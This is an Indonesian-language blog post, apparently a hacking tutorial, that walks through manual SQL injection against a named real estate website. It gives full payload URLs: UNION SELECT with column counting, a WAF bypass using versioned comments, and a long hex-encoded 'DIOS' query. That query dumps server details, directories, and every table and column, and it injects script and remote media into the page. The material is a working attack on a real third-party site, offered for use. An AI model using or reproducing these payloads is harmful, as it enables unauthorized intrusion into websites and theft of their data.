Assalamualaikum wr.wb
Oke gan kali ini gua akan share
tutorial SQLI Loncal variabel Oke Ga usah
banyak ngoceh langsung ae :v
Siapkan target dulu bre
Di sini gua udah punya target yaitu :
Oke pertama kita test vulnerability nya dulu :v
Caranya kalian tambahin singel quote (') di belakang id parameter nya :v
Lanjut :v
Kita ketahap by order
Apa yang terjadi ?
Oke kalian Naikin angka 1 menjadi 2 menjadi 3 dan seterusnya, sampai web nya terjadi error
Wah erornya di 16
Jadi kita stop 15 aja
Lansung kita union
http://www.ganeshambuilders.com/property_detail.php?id=2'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+-
Wah lah kok gak muncul tugelnya we byass dulu y
Oke kita bypass :v
Caranya kalian tambahin perintah +and+mod(9,9)+/*!50000union*/+/*!50000select*/
Contoh :
Nah muncul togel angka 2
Oke sekarang kita Open Databes nya dengan cara Memberikan Dios di nomor togel nya :v
Contoh
http://www.ganeshambuilders.com/property_detail.php?id=2%27+and+mod(9,9)+/*!50000union*/+/*!50000select*/+1,%20concat+(0x3c63656e7465723e3c696d67207372633d2268747470733a2f2f622e746f7034746f702e696f2f705f3138383832656a327a302e6a7067222077696474683d2233323022206865696768743d22323730223e3c62723e5465616d204d6f647320696e640e3c627574746f6e20636c6173733d226c61677522206f6e636c69636b3d22706c617928293b6c69617428293b223e3c666f6e7420666163653d2254656b6f222073697a653d2231302220636f6c6f723d2252656422203e4d522079796369733c2f666f6e743e3c2f627574746f6e3e3c617564696f2069643d226c61677522207372633d2268747470733a2f2f682e746f7034746f702e696f2f6d5f313737373665343836302e6d7033223e3c2f617564696f3e3c62723e3c7363726970743e,0x3c627574746f6e20636c6173733d226c61677522206f6e636c69636b3d22706c617928293b6c69617428293b223e3c666f6e7420666163653d2254656b6f222073697a653d2231302220636f6c6f723d2272656422203e4d52343034582d52524f523c2f666f6e743e3c2f627574746f6e3e3c617564696f2069643d226c61677522207372633d2268747470733a2f2f672e746f7034746f702e696f2f6d5f313831316779736d74302e6d7034223e3c2f617564696f3e3c62723e3c7363726970743e2066756e6374696f6e20706c617928297b2076617220617564696f203d20646f63756d656e742e676574456c656d656e744279496428276c61677527293b20617564696f2e706c617928293b207d2066756e6374696f6e206c69617428297b20646f63756d656e742e676574456c656d656e7442794964282767616c69617427292e7374796c652e7669736962696c6974793d2776697369626c65273b207d200a2020203c2f7363726970743e,0x3C62723E,0x55534552203A3A20,user(),0x3C62723E,0x555345522043555252454e54203a3a20,current_user,0x3C62723E,0x484F5354203A3A20,%40%40hostname,0x3C62723E,0x56455253494F4E203A3A20,version(),0x3C62723E,0x4441544142415345203A3A20,database(),0x3C62723E,0x44415445202f2054494d45203a3a20,NOW(),0x3C62723E,0x53534C203A3A20,%40%40GLOBAL.have_ssl,0x3C62723E,0x53594D4C494E4B203A3A20,%40%40GLOBAL.have_symlink,0x3C62723E,0x4F53203A3A20,%40%40version_compile_os,0x3C62723E,0x5049442046494c45203a3a20,%40%40PID_FILE,0x3C62723E,0x4241534520444952203a3a20,%40%40basedir,0x3C62723E,0x544d5020444952203a3a20,%40%40tmpdir,0x3C62723E,0x4441544120444952203A3A20,%40%40datadir,0x3C62723E,0x504c5547494e20444952203a3a20,%40%40plugin_dir,0x3C62723E,0x4552524f52204c4f47203a3a20,%40%40LOG_ERROR,0x3C62723E,0x434841524143544552205345545320444952203a3a20,%40%40character_sets_dir,0x3C62723E,0x534f434b455420444952203a3a20,%40%40socket,0x3C62723E,0x55554944203a3a20,UUID(),0x3C62723E,0x504F5254203A3A20,%40%40port,0x3C62723E,0x4d414348494e45203a3a20,%40%40VERSION_COMPILE_MACHINE,0x3C62723E,0x46494c452053595354454d203a3a20,%40%40CHARACTER_SET_FILESYSTEM,0x3C62723E,0x3C62723E,0x3c627574746f6e20636c6173733d226c61677522206f6e636c69636b3d22706c617928293b6c69617428293b223e3c666f6e7420666163653d2254656b6f222073697a653d22362220636f6c6f723d2272656422203e44414d5020444154413c2f666f6e743e3c2f627574746f6e3e,0x3C62723E,(select(%40x)from(select(%40x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(%40x:=concat+(%40x,0x3c62723e,table_name,0x203a3a20,column_name,0x3C62723E,0x3c627574746f6e20636c6173733d226c61677522206f6e636c69636b3d22706c617928293b6c69617428293b223e3c666f6e7420666163653d2254656b6f222073697a653d22362220636f6c6f723d2272656422203e535550504f5254204b494d4948494d453c2f666f6e743e3c2f627574746f6e3e))))x))%20,3,4,5,6,7,8,9,10,11,12,13,14,15--+-
Komentar aja ok
Sekian bye
comment 0 Comments
more_vert